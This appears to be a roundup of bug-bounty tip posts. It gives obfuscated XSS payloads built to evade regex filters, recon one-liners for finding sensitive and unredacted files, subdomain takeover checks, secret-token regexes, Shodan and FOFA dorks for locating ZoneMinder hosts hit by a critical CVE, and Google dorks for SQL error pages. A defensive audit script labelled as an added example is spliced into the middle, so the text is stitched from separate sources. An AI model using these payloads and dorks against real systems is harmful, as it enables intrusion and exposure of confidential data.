Find sensitive files using Wayback
#bugbountytip #bugbounty #bugbountytips
waybackurls 123.com | grep --color -E "\.xls|\.tar\.gz|\.bak|\.xml|\.xlsx|\.json|\.rar|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tgz|\.7z"
An XSS payload with alert obfuscation, to bypass a regex filter
#infosec #cybersec #bugbountytip
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
Reduce Noise in Burp Suite with This Simple Trick!
Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
If you have any other filters to share, drop them in the comments!
AZURE_OPENAI_API_KEY /[a-f0-9]{32}$/
/ATATT3[a-zA-Z0-9_\-+=]{184,195}$/
#CyberSecurity #BugBounty #infosec #BugBountyTools #pentest #bugbountytips
Check for Subdomain Takeover Vulnerabilities
This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.
subfinder -d target.com -silent | while read -r sub; do host "$sub"; done | grep "NXDOMAIN"
Replace target.com with your target.
Hey everyone!
- Access challenging, real-world environments to hone your skills.
- Tackle new labs like Odyssey and Ascension as they roll out.
- Join a community of dedicated hackers pushing their skills to new heights.
Let's hack and learn together!
1. Use Katana to scan for document URLs:
katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC
2. Filter for potentially unredacted files:
grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc
This script finds document URLs with "redacted" in the name, strips it out, and checks if the unredacted version is accessible.
Admins often leave these unredacted files online by mistake, making them a high-medium (P3) severity finding for bug bounty programs.
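For the defender's side of the same check, here is an added example (not part of the original post) that audits an inventory of your own published document paths and reports every redacted file whose unredacted sibling is also published. The function names and the sample inventory are constructed for illustration, and it covers .docx as well as .pdf.

```shell
#!/bin/sh
# Added example: offline audit of a published-document inventory.

# Constructed sample inventory; in practice export it from the web root or CMS.
sample_inventory() {
cat <<'EOF'
/docs/report-2023_redacted.pdf
/docs/report-2023.pdf
/docs/Minutes-REDACTED.pdf
/docs/Minutes.pdf
/foia/contract_redacted.pdf
/foia/summary.pdf
/docs/budget-redacted.docx
/docs/budget.docx
EOF
}

# Reads one path per line on stdin and prints "redacted<TAB>original" for each
# redacted document whose name, minus the [-_]redacted marker, is also listed.
# The marker is matched case-insensitively; the rest of the path keeps its case
# because most web servers treat paths as case-sensitive.
find_exposed_originals() {
    awk '
    NF { paths[++n] = $0; seen[$0] = 1 }
    END {
        for (i = 1; i <= n; i++) {
            p = paths[i]
            if (tolower(p) !~ /redacted.*\.(pdf|docx)$/) continue
            cand = p
            # Strip every marker occurrence, mirroring the sed step above.
            while (match(tolower(cand), /[-_]?redacted/))
                cand = substr(cand, 1, RSTART - 1) substr(cand, RSTART + RLENGTH)
            if (cand in seen)
                printf "%s\t%s\n", p, cand
        }
    }'
}

# Files listed in the second column should be unpublished or access-controlled.
sample_inventory | find_exposed_originals
```
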
CVE-2024-51482: A 10/10 Severity Vulnerability Exposes ZoneMinder's SQL Databases
Dorks
HUNTER:/product.name="ZoneMinder"
SHODAN: http.favicon.hash:-1218152116
FOFA: app="ZoneMinder"
Refer: https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
#ZoneMinder #SQL #hunterhow #infosec #infosecurity #OSINT #Vulnerability
If you're new to malware development, this playlist is a solid introduction! It covers:
• Native API
• A quick refresher on processes, threads, and handles
• Syscalls
Check it out here: YouTube Playlist
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Google Dorking - SQL Errors
site:[TARGET] AND (intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()")